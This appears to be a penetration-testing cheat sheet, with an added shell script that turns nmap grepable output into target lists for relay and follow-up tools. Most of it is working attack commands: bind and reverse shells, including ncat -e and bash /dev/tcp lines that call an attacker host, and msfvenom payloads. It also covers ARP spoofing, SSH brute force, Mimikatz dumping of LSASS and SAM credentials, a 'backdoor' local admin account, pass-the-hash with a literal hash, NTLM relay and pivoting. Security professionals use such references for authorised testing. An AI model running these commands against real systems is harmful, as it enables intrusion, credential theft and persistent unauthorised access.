Hacking Tools Cheat Sheet
Compass Security, Version 1.0, October 2019 [Link]

Basic Linux Networking Tools

Show IP configuration:
# ip a l
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m [Link] eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add [Link]/24 dev eth0
DNS lookup:
# dig [Link]
Reverse DNS lookup:
# dig -x [Link]

Information Gathering

Find owner/contact of domain or IP address:
# whois [Link]
Get nameservers and test for DNS zone transfer:
# dig [Link] ns
# dig [Link] axfr @[Link]
Get hostnames from CT logs: search for %.[Link] on [Link]
Or using an nmap script:
# nmap -sn -Pn [Link] --script hostmap-crtsh
Combine various sources for subdomain enum:
# amass enum -src -brute -min-for-recursive 2 -d [Link]
Reverse DNS lookup of IP range:
# nmap -sL [Link]/24

TCP Tools

Listen on TCP port:
# ncat -l -p 1337
Connect to TCP port:
# ncat [Link] 1337

TLS Tools

Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout [Link] -out [Link] -nodes -subj "/CN=[Link]/"
Start TLS server:
# ncat --ssl -l -p 1337 --ssl-cert [Link] --ssl-key [Link]
Connect to TLS service:
# ncat --ssl [Link] 1337
Connect to TLS service using openssl:
# openssl s_client -connect [Link]:1337
Show certificate details:
# openssl s_client -connect [Link]:1337 | openssl x509 -text
Test TLS server certificate and ciphers:
# sslyze --regular [Link]:443
TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr ssl:[Link]
Online TLS tests:
▪ [Link], [Link]

HTTP Tools

Start Python webserver on port 2305:
# python3 -m [Link] 2305
Perform HTTP request:
# curl [Link]
Useful curl options:
▪ -k: Accept untrusted certificates
▪ -d "foo=bar": HTTP POST data
▪ -H "Foo: Bar": HTTP header
▪ -I: Perform HEAD request
▪ -L: Follow redirects
▪ -o [Link]: Write output file
▪ --proxy [Link]: Set proxy
Scan for common files/applications/configs:
# nikto -host [Link]
Enumerate common directory-/filenames:
# gobuster -u [Link] -w /usr/share/wordlists/dirb/[Link]

Sniffing

ARP spoofing:
# arpspoof -t [Link] [Link]
Or a graphical tool:
# ettercap -G
Show ARP cache:
# ip neigh
Delete ARP cache:
# ip neigh flush all
Sniff traffic:
# tcpdump [options] [filters]
Useful tcpdump options:
▪ -i interface: Interface, or any for all
▪ -n: Disable name and port resolution
▪ -A: Print in ASCII
▪ -XX: Print in hex and ASCII
▪ -w file: Write output PCAP file
▪ -r file: Read PCAP file
Useful tcpdump filters:
▪ not arp: No ARP packets
▪ port ftp or port 23: Only port 21 or 23
▪ host [Link]: Only from/to host
▪ net [Link]/24: Only from/to hosts in network
Advanced sniffing using tshark or Wireshark.
Sniffing over SSH on a remote host (exclude the SSH session itself so it does not capture its own traffic):
# ssh [Link] tcpdump -w- port not ssh | wireshark -k -i -
Search in network traffic:
# ngrep -i password
Show HTTP GET requests:
# urlsnarf
Show transmitted images:
# driftnet

Network Scanning

ARP scan:
# nmap -n -sn -PR [Link]/24
Nmap host discovery (ARP, ICMP, SYN 443/tcp, ACK 80/tcp):
# nmap -sn -n [Link]/24
TCP scan (SYN scan = half-open scan):
# nmap -Pn -n -sS -p 22,25,80,443,8080 [Link]/24
List Nmap scripts:
# ls /usr/share/nmap/scripts
Scan for EternalBlue vulnerable hosts (SMB, 445/tcp):
# nmap -n -Pn -p 445 --script smb-vuln-ms17-010 [Link]/24
Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" [Link]/24
Performance tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 [Link]/24
Useful nmap options:
▪ -n: Disable DNS resolution
▪ -PR: ARP host discovery
▪ -Pn: Disable host discovery
▪ -sn: Disable port scan (host discovery only)
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ --top-ports 50: Scan 50 top ports
▪ -iL file: Host input file
▪ -oA file: Write output files (3 types)
▪ -sC: Script scan (default scripts)
▪ --script <file/category>: Specific scripts
▪ -sV: Version detection
▪ -6: IPv6 scan
The target can be specified using CIDR notation ([Link]/24) or range definitions (10.13-37.5.1-23).
Fast scan using masscan:
# masscan -p80,8000-8100 --rate 20000 [Link]/8
Public internet scan databases:
▪ [Link], [Link]

Shells

Start bind shell (on victim):
# ncat -l -p 2305 -e "/bin/bash -i"
Connect to bind shell (on attacker):
# ncat [Link] 2305
Listen for reverse shell (on attacker):
# ncat -l -p 23
Start reverse shell (on victim):
# ncat -e "/bin/bash -i" [Link] 23
Start reverse shell with bash only (on victim):
# bash -i &>/dev/tcp/[Link]/42 0>&1
Upgrade to pseudo terminal:
# python -c 'import pty; [Link]("/bin/bash")'
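Added example (not part of the Compass cheat sheet): once a scan has been written with -oA, the .gnmap file is the easiest one to post-process. The functions below pull every open port out of grepable output and produce a one-host-per-line target list for the next step (nmap -iL, ntlmrelayx -tf, crackmapexec). The sample .gnmap content is constructed here to make the script run offline; it is not real scan output.

```shell
#!/usr/bin/env sh
# Added example: parse nmap grepable output (-oG, or the .gnmap written by -oA).
# SAMPLE_GNMAP below is a constructed excerpt, not a real scan.
set -eu

# Print "host port/proto service" for every port nmap reported as open.
# "Host:" lines are tab separated:  Host: IP (name)<TAB>Ports: a, b<TAB>Ignored State: ...
# and every port entry has the shape port/state/proto/owner/service/rpc/version/.
gnmap_open_ports() {  # $1 = .gnmap file
    awk -F'\t' '
        /^Host: / {
            host = $1
            sub(/^Host: /, "", host); sub(/ .*/, "", host)   # drop the "(name)" part
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                ports = $i; sub(/^Ports: /, "", ports)
                n = split(ports, p, ", ")
                for (j = 1; j <= n; j++) {
                    split(p[j], f, "/")
                    if (f[2] == "open") print host, f[1] "/" f[3], f[5]
                }
            }
        }' "$1"
}

# Hosts with a given port/proto open, one per line, e.g. 445/tcp as the
# candidate list for smb-vuln-ms17-010 or as an NTLM relay target file.
gnmap_hosts_with_open() {  # $1 = .gnmap file, $2 = port/proto
    gnmap_open_ports "$1" | awk -v want="$2" '$2 == want { print $1 }'
}

# Constructed sample: two hosts up, one down, a mix of open/closed/filtered ports.
SAMPLE_GNMAP=$(mktemp)
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
{
    printf '%s\n' '# Nmap 7.80 scan initiated as: nmap -Pn -sS -p 22,80,445,3389 -oA scan 10.13.37.0/28'
    printf 'Host: 10.13.37.10 ()\tStatus: Up\n'
    printf 'Host: 10.13.37.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/closed/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (0)\n'
    printf 'Host: 10.13.37.11 (pc05.example.local)\tStatus: Up\n'
    printf 'Host: 10.13.37.11 (pc05.example.local)\tPorts: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (2)\n'
    printf 'Host: 10.13.37.12 ()\tStatus: Down\n'
    printf '%s\n' '# Nmap done -- 16 IP addresses (2 hosts up) scanned in 1.23 seconds'
} > "$SAMPLE_GNMAP"

gnmap_open_ports "$SAMPLE_GNMAP"
echo '--- hosts with 445/tcp open:'
gnmap_hosts_with_open "$SAMPLE_GNMAP" 445/tcp
```

Only entries whose state field is exactly "open" are kept, so filtered and closed ports (the 3389/filtered entry on the first host above) never end up in the target list. Redirect gnmap_hosts_with_open into a file and pass it with -iL or -tf to the follow-up tool.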
Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
# searchsploit apache
Show exploit file path and copy it into clipboard:
# searchsploit -p 40142
Online vulnerability and exploit databases:
▪ [Link], [Link], [Link]

Cracking

Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./[Link] [Link]/24
Determine hash type:
# hashid 869d[...]bd88
Show example hash types for hashcat:
# hashcat --example-hashes
Crack hashes (e.g. mode 5600 for NetNTLMv2 captures from Responder; plain NTLM hashes from the SAM are mode 1000):
# hashcat -m 5600 -a 0 [Link] [Link]
Crack hashes using John the Ripper:
# john [Link]

Metasploit Framework

Start Metasploit:
# msfconsole
Search exploit:
> search eternalblue
Use exploit:
msf > use exploit/windows/smb/ms17_…
Configure exploit:
msf exploit(…) > show options
msf exploit(…) > set RHOST [Link]
Run exploit:
msf exploit(…) > exploit
Generate reverse shell (WAR):
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > [Link]
Reverse shell listener:
> use exploit/multi/handler
> set payload linux/x64/shell_reverse_tcp
> set LHOST [Link] # attacker
> set LPORT 443
> exploit
Upgrade to Meterpreter:
^Z (Ctrl-Z)
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it
Upload / download files:
meterpreter > upload [Link]
meterpreter > download c:\[Link]
Port forwarding to localhost:
> portfwd add -l 2323 -p 3389 -r [Link]
Pivoting through existing Meterpreter session:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route
SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run
Configure ProxyChains (the port must match SRVPORT):
# vi /etc/[Link]
[...]
socks4 [Link] 8080
Connect through SOCKS proxy:
# proxychains ncat [Link] 1337

Linux Privilege Escalation

Enumerate local information (-t for more tests):
# curl -o /tmp/linenum [Link]otuser/LinEnum/master/[Link]
# bash /tmp/linenum -r /tmp/report
Other hardening checks:
# lynis audit system
Use sudo/SUID/capabilities/etc. exploits from [Link].

Windows Privilege Escalation

Copy PowerUp.ps1 from GitHub "PowerShellMafia/PowerSploit" into PowerShell to bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23 /add
C:\> net localgroup Administrators backdoor /add
Scan for network shares:
# [Link] --host-file [Link] -u Administrator -p PasswordOrHash

Windows Credentials Gathering

Start Mimikatz and create log file:
C:\>[Link]
# privilege::debug
# log C:\tmp\[Link]
Read [Link] process dump:
# sekurlsa::minidump [Link]
The [Link] process can be dumped using the task manager or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM [Link]
C:\>reg save HKLM\SAM [Link]
Extract hashes using Mimikatz:
# lsadump::sam /system:[Link] /sam:[Link]

Pass-the-Hash

Impacket library on GitHub "SecureAuthCorp/impacket". Compiled for Windows on GitHub: "maaaaz/impacket-examples-windows".
Shell via pass-the-hash:
# ./[Link] -hashes :011AD41795657A8ED80AB3FF6F078D03 Administrator@[Link]
Over a subnet and extract SAM file:
# crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 [Link] --sam
Browse shares via pass-the-hash:
# ./[Link] [Link]/Administrator@[Link] -hashes 01[...]03:01[...]03
RDP via pass-the-hash:
# xfreerdp /u:user /d:domain /pth:011AD41795657A8ED80AB3FF6F078D03 /v:[Link]
Meterpreter via pass-the-hash:
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST [Link] # attacker
msf > set LPORT 443
msf > set RHOST [Link] # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>

NTLM Relay

Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smb-security-mode [Link]/24
Disable SMB and HTTP in [Link] and start Responder:
# ./[Link] -I eth0
NTLM relay to target and extract SAM file:
# ./[Link] -smb2support -t smb://[Link]
NTLM relay using SOCKS proxy:
# ./[Link] -tf [Link] -smb2support -socks
Configure ProxyChains:
# vi /etc/[Link]
[...]
socks4 [Link] 1080
Access files via SOCKS proxy (the relayed session is already authenticated, so any password is accepted):
# proxychains smbclient -m smb3 '\\[Link]\C$' -W pc05 -U Administrator%invalidPwd

Active Directory

Copy the content of SharpHound.ps1 from GitHub "BloodHoundAD/BloodHound" into a PowerShell and import the ZIP into BloodHound to find the paths for privilege escalation.
Download PingCastle from [Link] and generate a report.

More Online References

▪ GitHub "swisskyrepo/PayloadsAllTheThings"
▪ GitHub "danielmiessler/SecLists"
▪ GitHub "enaqx/awesome-pentest"